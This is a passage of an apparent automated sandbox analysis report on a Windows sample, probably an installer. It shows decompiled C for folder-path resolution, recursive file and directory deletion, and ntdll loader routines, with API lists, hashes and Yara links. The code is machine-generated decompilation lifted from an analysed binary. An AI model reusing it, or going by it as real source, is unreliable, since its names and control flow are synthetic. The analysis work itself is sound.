							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405B88(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x424000;
							E00405B66(_t86, (_t95 << 0xa) + 0x424000);
						} else {
							E00405AC4(_t86,  *0x423ea8);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DC8(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423ea4;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423ed8;
							E00405A4D(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423ed8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405B88(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B66(_a4, _t37);
			}




























                                                                                                    0x00405b88
                                                                                                    0x00405b88
                                                                                                    0x00405b88
                                                                                                    0x00405b8e
                                                                                                    0x00405b93
                                                                                                    0x00405ba4
                                                                                                    0x00405ba4
                                                                                                    0x00405baf
                                                                                                    0x00405bb1
                                                                                                    0x00405bb6
                                                                                                    0x00405bb9
                                                                                                    0x00405bba
                                                                                                    0x00405bc1
                                                                                                    0x00405bc3
                                                                                                    0x00405bc9
                                                                                                    0x00405bcc
                                                                                                    0x00405bcc
                                                                                                    0x00405da5
                                                                                                    0x00405da5
                                                                                                    0x00405da9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405bd9
                                                                                                    0x00405bdf
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405be5
                                                                                                    0x00405be6
                                                                                                    0x00405be9
                                                                                                    0x00405bec
                                                                                                    0x00405d98
                                                                                                    0x00405da2
                                                                                                    0x00405da4
                                                                                                    0x00405da4
                                                                                                    0x00405d9a
                                                                                                    0x00405d9c
                                                                                                    0x00405d9e
                                                                                                    0x00405d9f
                                                                                                    0x00405d9f
                                                                                                    0x00000000
                                                                                                    0x00405d98
                                                                                                    0x00405bf2
                                                                                                    0x00405bf6
                                                                                                    0x00405c06
                                                                                                    0x00405c0a
                                                                                                    0x00405c11
                                                                                                    0x00405c14
                                                                                                    0x00405c18
                                                                                                    0x00405c1e
                                                                                                    0x00405c21
                                                                                                    0x00405c24
                                                                                                    0x00405c27
                                                                                                    0x00405d42
                                                                                                    0x00405d45
                                                                                                    0x00405d75
                                                                                                    0x00405d78
                                                                                                    0x00405d7d
                                                                                                    0x00405d81
                                                                                                    0x00405d81
                                                                                                    0x00405d86
                                                                                                    0x00405d87
                                                                                                    0x00405d8c
                                                                                                    0x00405d8f
                                                                                                    0x00405d91
                                                                                                    0x00000000
                                                                                                    0x00405d91
                                                                                                    0x00405d47
                                                                                                    0x00405d4a
                                                                                                    0x00405d5f
                                                                                                    0x00405d66
                                                                                                    0x00405d4c
                                                                                                    0x00405d53
                                                                                                    0x00405d53
                                                                                                    0x00405d6e
                                                                                                    0x00405d71
                                                                                                    0x00405d3a
                                                                                                    0x00405d3b
                                                                                                    0x00405d3b
                                                                                                    0x00000000
                                                                                                    0x00405d71
                                                                                                    0x00405c2f
                                                                                                    0x00405c30
                                                                                                    0x00405c36
                                                                                                    0x00405c38
                                                                                                    0x00405c52
                                                                                                    0x00405c52
                                                                                                    0x00405c59
                                                                                                    0x00405c59
                                                                                                    0x00405c60
                                                                                                    0x00405c64
                                                                                                    0x00405c64
                                                                                                    0x00405c65
                                                                                                    0x00405c67
                                                                                                    0x00405ca0
                                                                                                    0x00405ca3
                                                                                                    0x00405cb3
                                                                                                    0x00405cb6
                                                                                                    0x00405cbe
                                                                                                    0x00405cc4
                                                                                                    0x00405cc4
                                                                                                    0x00405d20
                                                                                                    0x00405d20
                                                                                                    0x00405d22
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405cc8
                                                                                                    0x00405ccf
                                                                                                    0x00405cd0
                                                                                                    0x00405cd2
                                                                                                    0x00405cec
                                                                                                    0x00405cfa
                                                                                                    0x00405d00
                                                                                                    0x00405d02
                                                                                                    0x00405d1d
                                                                                                    0x00405d1d
                                                                                                    0x00405d1d
                                                                                                    0x00000000
                                                                                                    0x00405d1d
                                                                                                    0x00405d08
                                                                                                    0x00405d13
                                                                                                    0x00405d19
                                                                                                    0x00405d1b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405d1b
                                                                                                    0x00405cd4
                                                                                                    0x00405cd7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405ce6
                                                                                                    0x00405ce8
                                                                                                    0x00405cea
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405cea
                                                                                                    0x00000000
                                                                                                    0x00405d20
                                                                                                    0x00405cab
                                                                                                    0x00000000
                                                                                                    0x00405c69
                                                                                                    0x00405c6e
                                                                                                    0x00405c84
                                                                                                    0x00405c89
                                                                                                    0x00405c8c
                                                                                                    0x00405d29
                                                                                                    0x00405d29
                                                                                                    0x00405d2d
                                                                                                    0x00405d35
                                                                                                    0x00405d35
                                                                                                    0x00000000
                                                                                                    0x00405d2d
                                                                                                    0x00405c96
                                                                                                    0x00405d24
                                                                                                    0x00405d24
                                                                                                    0x00405d27
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405d27
                                                                                                    0x00405c67
                                                                                                    0x00405c3a
                                                                                                    0x00405c3e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405c40
                                                                                                    0x00405c44
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405c46
                                                                                                    0x00405c4a
                                                                                                    0x00000000
                                                                                                    0x00405c4c
                                                                                                    0x00405c4c
                                                                                                    0x00000000
                                                                                                    0x00405c4c
                                                                                                    0x00405c4a
                                                                                                    0x00405daf
                                                                                                    0x00405db9
                                                                                                    0x00405dc5
                                                                                                    0x00405dc5
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405C30
                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00405CAB
                                                                                                    • GetWindowsDirectoryA.KERNEL32(00422E40,00000400), ref: 00405CBE
                                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405CFA
                                                                                                    • SHGetPathFromIDListA.SHELL32(00000000,00422E40), ref: 00405D08
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00405D13
                                                                                                    • lstrcatA.KERNEL32(00422E40,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D35
                                                                                                    • lstrlenA.KERNEL32(00422E40,?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405D87
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                    • String ID: @.B$@.B$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                    • API String ID: 900638850-3135342408
                                                                                                    • Opcode ID: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
                                                                                                    • Instruction ID: 2bb53c71d9fe9ef1e56bc14ab20fd8486271744d1d3ead2cb2ad614034e11287
                                                                                                    • Opcode Fuzzy Hash: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
                                                                                                    • Instruction Fuzzy Hash: D7510131A04A04AAEF205F64DC88B7B3BA4DF55324F14823BE911B62D0D33C59829E4E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040548B, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 156filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 94%
                                                                                                    			E0040548B(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040573A(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72);
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B66(0x4214a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056A0(_t72);
					} else {
						lstrcatA(0x4214a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405684( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B66(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040581E(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404F04(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404F04(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004058B4();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040548B(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a8 - 0x5c;
					if( *0x4214a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E61(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405659(_t72);
							E0040581E(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404F04(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404F04(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004058B4();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                                    0x00405496
                                                                                                    0x0040549a
                                                                                                    0x004054a3
                                                                                                    0x004054a6
                                                                                                    0x004054a9
                                                                                                    0x004054b1
                                                                                                    0x004054b3
                                                                                                    0x004054b4
                                                                                                    0x00000000
                                                                                                    0x004054b4
                                                                                                    0x004054c3
                                                                                                    0x004054c3
                                                                                                    0x004054c6
                                                                                                    0x004054c9
                                                                                                    0x004054dd
                                                                                                    0x004054e4
                                                                                                    0x004054e9
                                                                                                    0x004054eb
                                                                                                    0x004054fb
                                                                                                    0x004054ed
                                                                                                    0x004054f3
                                                                                                    0x004054f3
                                                                                                    0x00405500
                                                                                                    0x00405503
                                                                                                    0x0040550e
                                                                                                    0x00405514
                                                                                                    0x00405519
                                                                                                    0x00405529
                                                                                                    0x0040552b
                                                                                                    0x00405531
                                                                                                    0x00405534
                                                                                                    0x00405537
                                                                                                    0x004055f4
                                                                                                    0x004055f4
                                                                                                    0x004055f8
                                                                                                    0x004055fa
                                                                                                    0x004055fa
                                                                                                    0x004055fa
                                                                                                    0x004055fa
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040553d
                                                                                                    0x0040553d
                                                                                                    0x00405546
                                                                                                    0x0040554c
                                                                                                    0x00405551
                                                                                                    0x00405554
                                                                                                    0x00405556
                                                                                                    0x0040555a
                                                                                                    0x0040555c
                                                                                                    0x0040555c
                                                                                                    0x0040555a
                                                                                                    0x0040555f
                                                                                                    0x00405562
                                                                                                    0x00405575
                                                                                                    0x00405577
                                                                                                    0x0040557c
                                                                                                    0x00405583
                                                                                                    0x0040559b
                                                                                                    0x004055a1
                                                                                                    0x004055a7
                                                                                                    0x004055a9
                                                                                                    0x004055ce
                                                                                                    0x004055ab
                                                                                                    0x004055ab
                                                                                                    0x004055af
                                                                                                    0x004055c3
                                                                                                    0x004055b1
                                                                                                    0x004055b4
                                                                                                    0x004055b9
                                                                                                    0x004055bb
                                                                                                    0x004055bc
                                                                                                    0x004055bc
                                                                                                    0x004055af
                                                                                                    0x00405585
                                                                                                    0x0040558b
                                                                                                    0x0040558d
                                                                                                    0x00405593
                                                                                                    0x00405593
                                                                                                    0x0040558d
                                                                                                    0x00000000
                                                                                                    0x00405583
                                                                                                    0x00405564
                                                                                                    0x00405567
                                                                                                    0x00405569
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040556b
                                                                                                    0x0040556d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040556f
                                                                                                    0x00405573
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004055d3
                                                                                                    0x004055dd
                                                                                                    0x004055e3
                                                                                                    0x004055e3
                                                                                                    0x004055ee
                                                                                                    0x00000000
                                                                                                    0x004055ee
                                                                                                    0x00405505
                                                                                                    0x0040550c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004054cb
                                                                                                    0x004054cb
                                                                                                    0x004054cd
                                                                                                    0x004055fe
                                                                                                    0x00405601
                                                                                                    0x00405604
                                                                                                    0x00405656
                                                                                                    0x00405656
                                                                                                    0x00405656
                                                                                                    0x00405606
                                                                                                    0x00405609
                                                                                                    0x00405614
                                                                                                    0x00405619
                                                                                                    0x0040561b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040561e
                                                                                                    0x00405624
                                                                                                    0x0040562a
                                                                                                    0x00405630
                                                                                                    0x00405632
                                                                                                    0x00000000
                                                                                                    0x0040564e
                                                                                                    0x00405634
                                                                                                    0x00405638
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040563d
                                                                                                    0x00405642
                                                                                                    0x00405643
                                                                                                    0x00000000
                                                                                                    0x00405644
                                                                                                    0x0040560b
                                                                                                    0x0040560b
                                                                                                    0x00000000
                                                                                                    0x0040560b
                                                                                                    0x004054d3
                                                                                                    0x004054d7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004054d7

                                                                                                    APIs
                                                                                                    • DeleteFileA.KERNEL32(?,?,00429000,00007866), ref: 004054A9
                                                                                                    • lstrcatA.KERNEL32(004214A8,\*.*,004214A8,?,00000000,?,00429000,00007866), ref: 004054F3
                                                                                                    • lstrcatA.KERNEL32(?,00409010,?,004214A8,?,00000000,?,00429000,00007866), ref: 00405514
                                                                                                    • lstrlenA.KERNEL32(?,?,00409010,?,004214A8,?,00000000,?,00429000,00007866), ref: 0040551A
                                                                                                    • FindFirstFileA.KERNEL32(004214A8,?,?,?,00409010,?,004214A8,?,00000000,?,00429000,00007866), ref: 0040552B
                                                                                                    • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004055DD
                                                                                                    • FindClose.KERNEL32(?), ref: 004055EE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 2035342205-1173974218
                                                                                                    • Opcode ID: 7a19b7ea85d0f8bff8962d5b7d174e9fed4053393f49275f79294cdc09bf412a
                                                                                                    • Instruction ID: bc429f5d1e1b14784ce7e3564347ec6ed469848bfd5577fff983359c073685a4
                                                                                                    • Opcode Fuzzy Hash: 7a19b7ea85d0f8bff8962d5b7d174e9fed4053393f49275f79294cdc09bf412a
                                                                                                    • Instruction Fuzzy Hash: 0351F331904A447ADB216B218C45BBF3B79CF42728F54847BF905711E2CB3C5A82DE6E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AB8E00, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 44%
                                                                                                    			E00AB8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xb7d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xb78464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xb75780 & 0x00000003) != 0) {
							E00B05510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xb75780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00ACB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xb77984; // 0x552bc0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xb78464; // 0x74790110
					 *0xb7b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00AB9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xb75780 & 0x00000005) != 0) {
						_push(_t49);
						E00B05510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                    0x00ab8e0f
                                                                                                    0x00ab8e16
                                                                                                    0x00ab8e19
                                                                                                    0x00ab8e1b
                                                                                                    0x00ab8e21
                                                                                                    0x00ab8e7f
                                                                                                    0x00ab8e85
                                                                                                    0x00af9354
                                                                                                    0x00af936c
                                                                                                    0x00af9371
                                                                                                    0x00af937b
                                                                                                    0x00af9381
                                                                                                    0x00af9381
                                                                                                    0x00af937b
                                                                                                    0x00ab8e9d
                                                                                                    0x00ab8e9d
                                                                                                    0x00ab8e29
                                                                                                    0x00ab8e2c
                                                                                                    0x00ab8e38
                                                                                                    0x00ab8e3e
                                                                                                    0x00ab8e43
                                                                                                    0x00ab8eb5
                                                                                                    0x00ab8eb9
                                                                                                    0x00af92aa
                                                                                                    0x00af92af
                                                                                                    0x00af92e8
                                                                                                    0x00af92e8
                                                                                                    0x00af92af
                                                                                                    0x00ab8eb9
                                                                                                    0x00ab8e45
                                                                                                    0x00ab8e53
                                                                                                    0x00ab8e5b
                                                                                                    0x00ab8e5f
                                                                                                    0x00ab8e78
                                                                                                    0x00ab8e78
                                                                                                    0x00ab8e7d
                                                                                                    0x00ab8ec3
                                                                                                    0x00ab8ecd
                                                                                                    0x00ab8ed2
                                                                                                    0x00ab8ed2
                                                                                                    0x00ab8ec5
                                                                                                    0x00ab8ec5
                                                                                                    0x00000000
                                                                                                    0x00ab8e7d
                                                                                                    0x00ab8e67
                                                                                                    0x00ab8ea4
                                                                                                    0x00af931a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af9320
                                                                                                    0x00ab8ea4
                                                                                                    0x00ab8e70
                                                                                                    0x00af9325
                                                                                                    0x00af9340
                                                                                                    0x00af9345
                                                                                                    0x00af9345
                                                                                                    0x00ab8e76
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 00AF933B, 00AF9367
                                                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 00AF9357
                                                                                                    • LdrpFindDllActivationContext, xrefs: 00AF9331, 00AF935D
                                                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00AF932A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: DebugPrintTimes
                                                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                    • API String ID: 3446177414-3779518884
                                                                                                    • Opcode ID: cf96c288c4daa1f7b4ac6cb681aab9c464a2942e4118e67266178a100b6dcad4
                                                                                                    • Instruction ID: cd0d620e8a7bb944ccbe14336bbc450ff96d3b09a1fe8d473c7ff5774ec73d8a
                                                                                                    • Opcode Fuzzy Hash: cf96c288c4daa1f7b4ac6cb681aab9c464a2942e4118e67266178a100b6dcad4
                                                                                                    • Instruction Fuzzy Hash: 18410931A00315AEDB35AB5CCC49BFAB6BCBB10744F094569E909571A3EF78ECC0C681
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00A93D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 96%
                                                                                                    			E00A93D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00A91B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
